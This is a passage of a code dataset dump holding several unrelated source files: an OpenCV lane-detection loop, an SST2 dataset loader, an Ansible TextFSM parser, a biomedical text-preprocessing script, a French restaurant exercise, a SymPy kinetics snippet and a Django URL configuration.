video.get(cv2.CAP_PROP_FPS) : {:.1f}\".format(videoFps)) \n except IndexError:\n logging.debug(\"file open failed, try opening camera...\")\n # print(\"file open failed, try opening camera...\")\n # webcam = cv2.VideoCapture(1)\n # webcam = cv2.VideoCapture(\"http://192.168.1.109:8000\")\n webcam = 
cv2.VideoCapture(\"./public/images/video/realCar02.mov\")\n # webcam.set(cv2.CAP_PROP_FRAME_WIDTH, 640.0)\n # webcam.set(cv2.CAP_PROP_FRAME_HEIGHT, 480.0)\n videoFrameTime = 1.0/30.0 ### temperally set to 1/30 sec\n return webcam\n\ndef main():\n fps = runWithFPS()\n traceMarkL = traceMark()\n traceMarkR = traceMark()\n landShiftObj = landShift()\n carView = CarView()\n webcam = getCap()\n yolo = Yoylv4Tiny()\n try:\n if sys.argv[2]==\"loop\":\n isLoop = True\n except:\n isLoop = False\n num = 1500\n while num !=\"-1\": # set num = -1 to end this script\n fps.start()\n webcam.set(cv2.CAP_PROP_POS_FRAMES, num)\n readFrameT = fps.deltaTime(\"CAP_PROP_POS_FRAMES\")\n fps.start()\n ret , frame = webcam.read()\n if not ret: # end of video\n if isLoop:\n webcam.set(cv2.CAP_PROP_POS_FRAMES, 0) # red video frame from 0\n _, frame = webcam.read()\n else:\n break\n frame = cv2.resize(frame, (852, 480), interpolation=cv2.INTER_AREA)\n ### yolo4 tiny detect\n classes, confs, boxes, objPts = yolo.nnProcess(frame)\n fps.deltaTime(\"yolo process\")\n distList, warpPoints = carView.getObjDistance(objPts)\n frame = yolo.drawBox(frame, classes, confs, boxes)\n ### analysis frame and do car land recognition\n debugFrame, acm = carView.process(frame, traceMarkL, traceMarkR, landShiftObj, fps=fps, debugMode=True)\n fps.deltaTime(\"carView process\")\n ### for debug obj distance\n ### get velocity land shift and send out\n shiftVel = landShiftObj.getVelocity()\n velL = traceMarkL.getMedVelocity()\n velR = traceMarkR.getMedVelocity()\n # logging.warning(\"outside velocity: \"+str(velL)+\" \"+str(velR))\n if velL==0:\n velAve = velR\n elif velR == 0:\n velAve = velL\n else:\n velAve = (velL+velR)/2\n landPts = landShiftObj.getUnwarpPts()\n ### transfer frame to base64 image string\n # ret, jpeg = cv2.imencode('.jpg', frame)\n # rJpeg = jpeg.tobytes()\n # rJpeg = base64.b64encode(rJpeg).decode('utf-8')\n ### prepare feedback data\n outMsg = f'\"inputID\":{num}, \"landShift\": \"{shiftVel:.1f}\", \"velocity\": \"{velAve:.1f}\"'\n # outMsg += f', \"landPts\":\"{landPts}\"'\n # outMsg += f', \"classes\":\"{classes}\"'\n # outMsg += f', \"boxes\":\"{boxes}\"'\n # outMsg += f', \"confs\":\"{confs}\"'\n outMsg += f', \"distList\":\"{distList}\"'\n # outMsg += f', \"image\":\"{rJpeg}\"'\n outMsg = \"{\"+outMsg+\"}\"\n print(outMsg, flush=True)\n ### debug mode\n # debug = carView.processObjPos(acm, warpPoints)\n # debugFrame = cv2.vconcat([debugFrame,debug])\n # k = cv2.waitKey(1)\n # if k == 27 or k == ord('q'):\n # break\n # cv2.imshow(\"debug\", debugFrame)\n # if int(num) >1600:\n # break\n # cv2.imwrite(f\"./python/carView/saveImg/debug{num}.jpg\", debugFrame)\n logging.debug(\"fps.getTime(): \"+str(fps.getTime()))\n logging.debug(\"webcam.get(cv2.CAP_PROP_FPS): \"+str(webcam.get(cv2.CAP_PROP_FPS)))\n logging.debug(\"Next frame count: \"+str(int(fps.getTime() * webcam.get(cv2.CAP_PROP_FPS))))\n num+=int( fps.getTime() * webcam.get(cv2.CAP_PROP_FPS))\n fps.deltaTime(\"end process\")\nif __name__==\"__main__\":\n main()","sub_path":"python/carView/nodeLandDetectByCapVdo.py","file_name":"nodeLandDetectByCapVdo.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"641998573","text":"import tqdm\nfrom rationale_net.utils.embedding import get_indices_tensor\nfrom rationale_net.datasets.factory import RegisterDataset\nfrom rationale_net.datasets.abstract_dataset import AbstractDataset\nimport pdb\n\nSMALL_TRAIN_SIZE = 
100\n\n@RegisterDataset('SST2')\nclass StanfordSentiment(AbstractDataset):\n\n def __init__(self, args, word_to_indx, mode, max_length=90, stem='raw_data/stanford-sentiment-dataset-master/stsa.binary.'):\n self.args= args\n self.name = mode\n self.objective = args.objective\n self.dataset = []\n self.word_to_indx = word_to_indx\n self.max_length = max_length\n self.class_balance = {}\n with open(stem+self.name) as f:\n lines = f.readlines()\n lines = list(zip( range(len(lines)), lines) )\n if args.debug_mode:\n lines = lines[:SMALL_TRAIN_SIZE]\n for indx, line in tqdm.tqdm(enumerate(lines)):\n uid, line_content = line\n sample = self.processLine(line_content, indx)\n\n if not sample['y'] in self.class_balance:\n self.class_balance[ sample['y'] ] = 0\n self.class_balance[ sample['y'] ] += 1\n sample['uid'] = uid\n self.dataset.append(sample)\n f.close()\n print (\"Class balance\", self.class_balance)\n\n if args.class_balance:\n raise NotImplementedError(\"SST2 dataset doesn't support balanced sampling!\")\n\n ## Convert one line from beer dataset to {Text, Tensor, Labels}\n def processLine(self, line, i):\n if isinstance(line, bytes):\n line = line.decode()\n label = float(line[0])\n if self.objective == 'mse':\n raise NotImplementedError(\"SST2 dataset only allows binary classification\")\n else:\n self.args.num_class = 2\n text_list = line[2:].split()[:self.max_length]\n text = \" \".join(text_list)\n x = get_indices_tensor(text_list, self.word_to_indx, self.max_length)\n sample = {'text':text,'x':x, 'y':label, 'i':i}\n return sample\n","sub_path":"rationale_net/datasets/SST2_dataset.py","file_name":"SST2_dataset.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"102500953","text":"#!/usr/bin/python\n#coding: utf-8 -*-\nimport textfsm\n\n\nclass SIIBparse(object):\n\n def __init__(self, module):\n self.output_text = module.params['output_text']\n self.ip2intf = list()\n\n def parse(self):\n template = '/home/nata/day6/ansible/templates/cisco_ios_show_ip_int_brief.template'\n f = open(template, 'r')\n re_table = textfsm.TextFSM(f)\n header = re_table.header\n data = re_table.ParseText(self.output_text)\n self.ip2intf = [ dict(zip(header,v)) for v in data ]\n\n result = {\n \"IPs\": self.ip2intf\n }\n rc = 0 if len(self.ip2intf) > 0 else 1\n return rc, result\n\ndef main():\n module = AnsibleModule(\n argument_spec=dict(\n output_text=dict(required=True, type='str')\n )\n )\n siib = SIIBparse(module)\n rc, result = siib.parse()\n if rc != 0:\n module.fail_json(msg=\"Failed to parse. Incorrect input.\")\n else:\n module.exit_json(changed=False, ansible_facts=result)\n\n# import module snippets\nfrom ansible.module_utils.basic import *\nmain()\n","sub_path":"examples/day7/ansible_network/library/cisco_ip_intf_parse.py","file_name":"cisco_ip_intf_parse.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"203881144","text":"# -*- coding: UTF-8 -*-\nimport json\nimport re\nfrom optparse import OptionParser\nimport os\nimport sys\nfrom time import time\n\nimport nltk\n\n__author__ = 'CMendezC'\n\n\n# Objective: Preprocessing paper files:\n# Eliminate lines beginning with:\n# Copyright � 1997\n# © 1997 Elsevier\n# Copyright © 1998,\n# Keywords: GntR; cAMP-CRP; GntP family\n# Received 21 October 1996/Accepted 27 December 1996\n# Received 6 January 1997; accepted 5 June 1997; Received by A. 
Nakazawa\n# (Received 29 June 1998/Accepted 3 August 1998)\n# REFERENCES: Eisenberg, R.C., Dobrogosz, W.J., 1967 | Hung, A., Orozco, A., Zwaig, N., 1970.\n# Shine, J. & Dalgarno, L. (1974).\n# 34. Saier, M. H., T. M. Ramseier, and J. Reizer. 1996.\n# * Corresponding author. Mailing address: Department of Microbiology,\n# Phone: (614) 688-3518.\n# Fax: (614) 688-3519.\n# E-mail: conway.51@osu.edu.\n# Downloaded from\n# Selecting lines until ACKNOWLEDGMENTS or REFERENCES or Acknowledgements or References\n# Biological term detection\n\n# Parameters:\n# 1) --inputPath Path to read TXT files.\n# 2) --outputPath Path to place POST files.\n# 3) --termPath Path to read term lists\n# 4) --termFiles JSON file with terms files and length\n# 5) --termDetection If term detection is performed\n# 6) --multiDocument Processing multidocuments within input file?\n# 7) --tabFormat File with format PMID\\tNUMSENT\\tSENT\\tCLASS?\n# 8) --joinPunctuation Join separated punctuation (it comes separated from ODIN-XML files)\n\n# Output:\n# 1) preprocessed files with biological term detection\n\n# Execution:\n# GntR\n# python preprocessingTermDetection.py --inputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT\\ECK120012096_GntR\\original --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT\\ECK120012096_GntR\\preprocessed --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\resources\\termLists --termFiles termFilesLength.json\n\n# FhlA\n# python preprocessingTermDetection.py --inputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011394_FhlA\\original --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011394_FhlA\\preprocessed --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\resources\\termLists --termFiles termFilesLength.json\n\n# MarA\n# python preprocessingTermDetection.py --inputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011412_MarA\\original --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011412_MarA\\preprocessed --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\resources\\termLists --termFiles termFilesLength.json\n\n# ArgR\n# python preprocessingTermDetection.py --inputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011670_ArgR\\original --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011670_ArgR\\preprocessed --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\resources\\termLists --termFiles termFilesLength.json\n\n# CytR\n# python preprocessingTermDetection.py --inputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120012407_CytR\\original --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120012407_CytR\\preprocessed --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\resources\\termLists --termFiles termFilesLength.json\n\n# Rob\n# python preprocessingTermDetection.py --inputPath 
C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011190_Rob\\original --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011190_Rob\\preprocessed --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\resources\\termLists --termFiles termFilesLength.json\n\n# EXTRACTING REGULATORY INTERACTIONS\n# python preprocessingTermDetection.py\n# --inputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\EXTRACTING_REGULATORY_INTERACTIONS\\corpus_ecoli\\original\n# --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\EXTRACTING_REGULATORY_INTERACTIONS\\corpus_ecoli\\preprocessed\n# --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\preprocessingTermTagging_v1.0\\termLists\n# --termFiles termFilesLength.json\n\n# def addEndPeriod(cad):\n# if cad.endswith('.'):\n# return cad\n# else:\n# return cad + '.'\n\n\n###########################################################\n# MAIN PROGRAM #\n###########################################################\n\nif __name__ == \"__main__\":\n # Parameter definition\n parser = OptionParser()\n parser.add_option(\"--inputPath\", dest=\"inputPath\",\n help=\"Path to read input files\", metavar=\"PATH\")\n parser.add_option(\"--outputPath\", dest=\"outputPath\",\n help=\"Path to place output files\", metavar=\"PATH\")\n parser.add_option(\"--termPath\", dest=\"termPath\",\n help=\"Path of term files\", metavar=\"PATH\")\n parser.add_option(\"--termFiles\", dest=\"termFiles\",\n help=\"JSON file with terms files and length\", metavar=\"PATH\")\n parser.add_option(\"--termDetection\", default=False,\n action=\"store_true\", dest=\"termDetection\",\n help=\"Perform term detection?\")\n parser.add_option(\"--multiDocument\", default=False,\n action=\"store_true\", dest=\"multiDocument\",\n help=\"Processing multidocuments within input file?\")\n parser.add_option(\"--tabFormat\", default=False,\n action=\"store_true\", dest=\"tabFormat\",\n help=\"File with format PMID\\tNUMSENT\\tSENT\\tCLASS?\")\n parser.add_option(\"--joinPunctuation\", default=False,\n action=\"store_true\", dest=\"joinPunctuation\",\n help=\"Join separated punctuation?\")\n\n (options, args) = parser.parse_args()\n\n if len(args) > 0:\n parser.error(\"None parameters indicated.\")\n sys.exit(1)\n\n # Printing parameter values\n print('-------------------------------- PARAMETERS --------------------------------')\n print(\"Path to read input files: \" + str(options.inputPath))\n print(\"Path to place output files: \" + str(options.outputPath))\n print(\"Perform term detection?: \" + str(options.termDetection))\n if options.termDetection:\n print(\"Path to read terminological resources: \" + str(options.termPath))\n print(\"JSON file with terms files and length: \" + str(options.termFiles))\n print(\"Processing multidocuments within input file?: \" + str(options.multiDocument))\n print(\"File with format PMID\\tNUMSENT\\tSENT\\tCLASS?: \" + str(options.tabFormat))\n print(\"Join separated punctuation?: \" + str(options.joinPunctuation))\n\n # #### REGEX DEFINITION FOR UNNECESSARY LINES #####\n regexEmptyLine = re.compile('^\\s*$')\n # Copyright � 1997\n # © 1997 Elsevier\n # Copyright © 1998,\n # Keywords: GntR; cAMP-CRP; GntP family\n # Received 21 October 1996/Accepted 27 December 1996\n # Received 6 January 1997; accepted 5 June 1997; Received by A. Nakazawa\n # (Received 29 June 1998/Accepted 3 August 1998)\n # * Corresponding author. 
Mailing address: Department of Microbiology,\n # Phone: (614) 688-3518.\n # Fax: (614) 688-3519.\n # E-mail: conway.51@osu.edu.\n # Downloaded from\n # www.sciencedirect.com Current Opinion in Microbiology 2008, 11:87–93\f88 Cell regulation\n # DOI 10.1016 / j.mib .2008.02.007\n # Correspondence to J\n\n # journal homepage: www.elsevier.com/locate/biotechadv\n # Research review paper\n # Article history:\n # Accepted 18 April 2014\n # Available online 26 April 2014\n # Abbreviations : ROS ,\n # JOURNAL OF\n # 0021-9193/02\n\n # Mailing address : CSIC - Estación Experimental del Zaidín , Apdo .\n # Correos 419 , E - 18008 Granada , Spain .\n # Phone : 34 - 58 - 121011 .\n # Fax : 34 - 58 - 129600 .\n # Present address : Department of Biology , Imperial College of Science ,\n\n expression = '^(Copyright|© [0-9][0-9][0-9][0-9]|Keywords:|\\(?Received [0-9]?[0-9]|\\*?\\s?Corresponding author|' + \\\n 'Phone:|Fax:|E-mail:|Phone\\s:|Fax\\s:|E-mail\\s:|Mailing\\saddress\\s:|Present\\saddress\\s:|' + \\\n 'Downloaded\\sfrom|DOI|www\\.sciencedirect\\.com|Correspondence to [A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ]|' + \\\n 'journal homepage:|Research review paper|Article history:|\\(?Accepted [0-9]?[0-9]|' + \\\n 'Available online|Abbreviations:|ACKNOWLEDGMENTS\\s|REFERENCES\\s|' + \\\n 'All rights reserved|Published by Elsevier|' + \\\n 'Verbatim copying and redistribution of this article|J Bacteriol [0-9][0-9][0-9][0-9]|' + \\\n 'Mol Microbiol [0-9][0-9][0-9][0-9]|Nucleic Acids Res [0-9][0-9][0-9][0-9]|' + \\\n 'JOURNAL OF|[0-9][0-9][0-9][0-9]\\-[0-9][0-9][0-9]/[0-9][0-9]|[0-9][0-9][0-9] – [0-9][0-9][0-9] Vol)'\n regexUnnecessaryLines = re.compile(expression)\n #regexUnnecessaryLines = re.compile('^(Copyright)')\n # REFERENCES: Eisenberg, R.C., Dobrogosz, W.J., 1967\n # Hung, A., Orozco, A., Zwaig, N., 1970.\n # Shine, J. & Dalgarno, L. (1974).\n # 34. Saier, M. H., T. M. Ramseier, and J. Reizer. 1996.\n # 1. Pesavento, C. & Hengge, R. Bacterial nucleotide-based\n # Battesti , N .\n # Aiba , H . , T .\n # Yamamoto , and M .\n # regexReferences = re.compile('^([0-9]?[0-9]\\.\\s)?[A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ][a-záéíóúàèìòùüâêîôû\\-]+\\s?,\\s([A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ]\\s?\\.\\s?)+.*([0-9][0-9][0-9][0-9])')\n # regexReferences = re.compile('^([0-9]?[0-9]\\.\\s)?[A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ][a-záéíóúàèìòùüâêîôû\\-]+\\s?,\\s([A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ]\\s?\\.\\s?)+')\n regexReferences = re.compile('^([0-9]?[0-9]\\.\\s)?[A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ][a-záéíóúàèìòùüâêîôû\\-]+\\s?,\\s([A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ]\\s?\\.\\s?)+($|.*\\(\\s?[0-9][0-9][0-9][0-9]\\s?\\))')\n # Lines without words, with only symbols\n # --.-,.;....a...........c....\n # .........\n # 2.;\n # ..~......: ........................\n # ::..:.< -.;-.:.;L.:.5 %..-.-...;..;..,:\n # ?........., .....,: ........,,::, , ...\n # ..\n # .J\n # L,.\n # 2\n # i\n # regexLinesNoText = re.compile('^[^a-zA-Z0-9]')\n\n # regexUnderscoreWord = re.compile(r'\\b_\\b')\n\n # 40 o more dots which appear in index lines\n regexIndexLine = re.compile('\\.{40}')\n\n # e-mails\n regexEmail = re.compile(\n '(e-mail : |e-mail: |e-mail )?([a-zA-Z0-9\\._\\-]+@[a-zA-Z0-9\\-]+\\.[a-zA-Z0-9\\-]+\\.[a-zA-Z0-9\\-]+ |[a-zA-Z0-9\\._\\-]+@[a-zA-Z0-9\\-]+\\.[a-zA-Z0-9\\-]+\\.[a-zA-Z0-9\\-]+\\.[a-zA-Z0-9\\-]+ )')\n\n ### DETECTAR CONTENTS Y ELIMINAR HASTA INTRODUCTION (?): Overview of oxidative stress response ... ... 
28 2 .\n ### IF IT IS INTRODUCTION, ACKNOWLEDGMENTS OR ANOTHER TITLE, ADD A PERIOD TO IT, OR REMOVE IT IF IT IS AT THE BEGINNING OF A WORD AND NO OTHER WORD FOLLOWS.\n # SOMETIMES Summary IS USED\n\n # Join separated punctuation\n if options.joinPunctuation:\n # 1) join to right: (, [, “, ‘, ±, ~\n regexPuncRigth = re.compile('(?P<punc>[\\(\\[“‘±~])\\s')\n # 2) join to left: ), ], ., ,, ”, ´, ;, %, :, ’, '\n regexPuncLeft = re.compile('\\s(?P<punc>[\\)\\]\\.,”´;%:’\\'])')\n # 3) join both sides: -, /, –, —\n regexPuncBoth = re.compile('\\s(?P<punc>[-/–—])\\s')\n # 4) genitive: ArgP ’ s\n regexPuncGenitive = re.compile('(?P<letter>[a-zA-Z])\\s’\\ss\\s')\n\n # #### LOADING BIOLOGICAL TERM FILES #####\n if options.termDetection:\n with open(os.path.join(options.termPath, options.termFiles)) as data_file:\n lists = json.load(data_file)\n\n listTermFiles = lists[\"listTermFiles\"]\n listTerms = lists[\"listTerms\"]\n\n for key in listTermFiles.keys():\n for f in listTermFiles[key]:\n with open(os.path.join(options.termPath, f), \"r\", encoding=\"utf-8\", errors=\"replace\") as iFile:\n for line in iFile:\n line = line.strip('\\n')\n if line not in listTerms[key]:\n listTerms[key].append(line)\n print(' Terms read {} size: {}'.format(key, len(listTerms[key])))\n\n filesProcessed = 0\n t0 = time()\n print(\"Preprocessing files...\")\n # Walk directory to read files\n for path, dirs, files in os.walk(options.inputPath):\n # For each file in dir\n for file in files:\n if file.endswith('.txt'):\n print(\" Preprocessing file...\" + str(file))\n text = ''\n listSentences = []\n references = 0\n with open(os.path.join(path, file), \"r\", encoding=\"utf-8\", errors=\"replace\") as iFile:\n # Create output file to write\n # with open(os.path.join(options.outputPath, file.replace('.txt', '.pre.txt')), \"w\", encoding=\"utf-8\") as oFile:\n for line in iFile:\n originalLine = line.strip('\\n')\n if options.joinPunctuation:\n originalLine = regexPuncGenitive.sub(r'\\g<letter>’s', originalLine)\n originalLine = regexPuncRigth.sub(r'\\g<punc>', originalLine)\n originalLine = regexPuncLeft.sub(r'\\g<punc>', originalLine)\n originalLine = regexPuncBoth.sub(r'\\g<punc>', originalLine)\n if options.tabFormat:\n listLine = originalLine.split('\\t')\n line = listLine[2]\n ### DETECT ACKNOWLEDGMENTS AND REMOVE EVERYTHING THAT FOLLOWS\n # This eliminates useful parts of papers: if line.upper().startswith('ACKNOWLEDGMENT') or line.upper().startswith('REFERENCES') or references > 2:\n if not options.multiDocument:\n if line.upper() == 'ACKNOWLEDGMENTS' or line.upper() == 'REFERENCES' or references > 2:\n break\n # if line == '' or line == None:\n #if regexEmptyLine.match(line) != None:\n # print('Empty line ' + line)\n # continue\n #if regexReferences.match(line) != None:\n # print('Reference line ' + str(line.encode(encoding='UTF-8', errors='replace')))\n # references += 1\n # continue\n # if regexUnnecessaryLines.match(line) != None:\n #if regexUnnecessaryLines.search(line) != None:\n # print('Unnecessary line ' + str(line.encode(encoding='UTF-8', errors='replace')))\n # continue\n #if regexIndexLine.search(line) != None:\n # print('Index line ' + line)\n # continue\n #if regexEmail.search(line) != None:\n # print('Line with email: ' + line)\n # line = regexEmail.sub(' ', line)\n # print(line)\n\n text += originalLine + '\\n'\n\n if options.termDetection:\n # #### BIOLOGICAL TERM DETECTION #####\n print(' Detecting biological terms...')\n for key in sorted(listTerms.keys(), reverse=True):\n #print(' length: ' + str(key))\n for term in listTerms[key]:\n #print(str(term.encode(encoding='UTF-8', 
errors='replace')))\n text = text.replace(term, term.replace(' ', '-'))\n #regexTerm = re.compile(r'' + term)\n #regexTerm.sub(term.replace(' ', '_TERM_'), text)\n\n filesProcessed += 1\n with open(os.path.join(options.outputPath, file.replace(' ', '').replace('.txt', '.pre.txt')), \"w\", encoding=\"utf-8\") as oFile:\n oFile.write(text)\n\n # Print count of processed files\n print()\n print(\"Files preprocessed: \" + str(filesProcessed))\n print(\"In: %fs\" % (time() - t0))\n","sub_path":"summarizer/preprocessingTermDetection.py","file_name":"preprocessingTermDetection.py","file_ext":"py","file_size_in_byte":17364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"}
{"seq_id":"121976480","text":"#!/usr/bin/python3\n# coding: utf-8\n\n\ndef affRestos():\n global lesRestos\n\n for unResto in lesRestos:\n if unResto['ouvert'] == True:\n libelleOuverture = 'ouvert'\n else:\n libelleOuverture = 'fermé'\n print( '{0} : {1}\\t{2}'.format( unResto['arrdt'] , unResto['nom'] , libelleOuverture ) )\n\n\ndef getUnResto( nom ) :\n global lesRestos\n\n leResto = None\n\n i = 0\n while i < len( lesRestos ) and leResto == None :\n if lesRestos[ i ][ 'nom' ] == nom :\n leResto = lesRestos[ i ]\n else :\n i = i + 1\n\n return leResto\n\n\ndef ouvrirUnResto( nom ) :\n global lesRestos\n\n # Exercice 6 (a possible implementation): mark the named restaurant as open\n leResto = getUnResto( nom )\n if leResto != None :\n leResto[ 'ouvert' ] = True\n\n\nif __name__ == '__main__':\n lesRestos = [\n\n {'nom': 'Hao Long', 'arrdt': 1, 'ouvert': True, 'spec': 'chinois'},\n {'nom': 'A Casaluna', 'arrdt': 1, 'ouvert': True, 'spec': 'corse'},\n {'nom': 'Le Pot de Vins', 'arrdt': 1, 'ouvert': False, 'spec': 'français'},\n {'nom': 'Comptoir Montevideo', 'arrdt': 1, 'ouvert': False, 'spec': 'latino'},\n {'nom': 'Carrousel Français', 'arrdt': 1, 'ouvert': True, 'spec': 'français'},\n {'nom': 'Mumi', 'arrdt': 1, 'ouvert': True, 'spec': 'français'},\n {'nom': 'L\\'Atelier du Tartare', 'arrdt': 1, 'ouvert': True, 'spec': 'français'},\n {'nom': 'Lobster Bar', 'arrdt': 1, 'ouvert': False, 'spec': 'américain'},\n {'nom': 'Sequana', 'arrdt': 1, 'ouvert': True, 'spec': 'français'},\n {'nom': 'Autour du Saumon Convention', 'arrdt': 15, 'ouvert': True, 'spec': 'scandinave'},\n {'nom': 'Chez Marc', 'arrdt': 15, 'ouvert': True, 'spec': 'libanais'},\n {'nom': 'Jeongané', 'arrdt': 15, 'ouvert': True, 'spec': 'coréen'},\n {'nom': 'Neige d\\'été', 'arrdt': 15, 'ouvert': True, 'spec': 'fusion'},\n {'nom': 'Le Caroubier', 'arrdt': 15, 'ouvert': True, 'spec': 'marocain'},\n {'nom': 'Le Quinzième', 'arrdt': 15, 'ouvert': False, 'spec': 'français'},\n {'nom': 'Ristorantino Shardana', 'arrdt': 15, 'ouvert': False, 'spec': 'italien'},\n {'nom': 'Hanaza', 'arrdt': 15, 'ouvert': True, 'spec': 'japonais'},\n {'nom': 'Tipaza', 'arrdt': 15, 'ouvert': True, 'spec': 'marocain'},\n {'nom': 'Le Palais de Shah Jahan', 'arrdt': 15, 'ouvert': False, 'spec': 'indien'},\n {'nom': 'La Table Libanaise', 'arrdt': 15, 'ouvert': True, 'spec': 'libanais'},\n {'nom': 'Terres du Sud', 'arrdt': 15, 'ouvert': True, 'spec': 'latino'},\n {'nom': 'Sagarmatha', 'arrdt': 15, 'ouvert': True, 'spec': 'libanais'},\n {'nom': 'Lakou', 'arrdt': 15, 'ouvert': True, 'spec': 'asiatique'}\n\n ]\n\n print( '--- Avant ouverture du restaurant Lobster Bar ---\\n' )\n affRestos()\n\n ouvrirUnResto( 'Lobster Bar' )\n\n print( '\\n\\n--- Après ouverture du restaurant Lobster Bar ---\\n' )\n 
affRestos()\n","sub_path":"TesterOuvrirUnResto.py","file_name":"TesterOuvrirUnResto.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"}
{"seq_id":"302818937","text":"from sympy import *\n\nT = 1.000000e+03\nt = symbols(\"t\")\nA, B = symbols(\"A B", cls=Function)\n\nr0 = 1.000000e+00*A(t)\n\neq1 = Eq(Derivative(A(t), t) + r0)\neq2 = Eq(Derivative(B(t), t) - r0)\n\neq = (eq1, eq2)\nsol = dsolve(eq)\n\nprint(sol)\n","sub_path":"python/sympy/kinetics/mechanism-equations-keep-0.py","file_name":"mechanism-equations-keep-0.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"}
{"seq_id":"115627074","text":"\"\"\"foodstorage URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls import url, include\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom rest_framework.authtoken import views\n\nfrom .views import IndexAPI\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n\n url(r'^auth/', views.obtain_auth_token, name='auth'),\n\n url(r'^$', IndexAPI.as_view(), name='index'),\n url(r'^users/', include('users.urls')),\n url(r'^photos/', include('photos.urls')),\n url(r'^ratings/', include('ratings.urls')),\n]\n\nurlpatterns.extend(\n static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n)\nurlpatterns.extend(\n static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n)\n\nif settings.DEBUG:\n urlpatterns.append(\n url(\n r'^api-auth/',\n include('rest_framework.urls', namespace='rest_framework')\n )\n )","sub_path":"foodstorage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"}
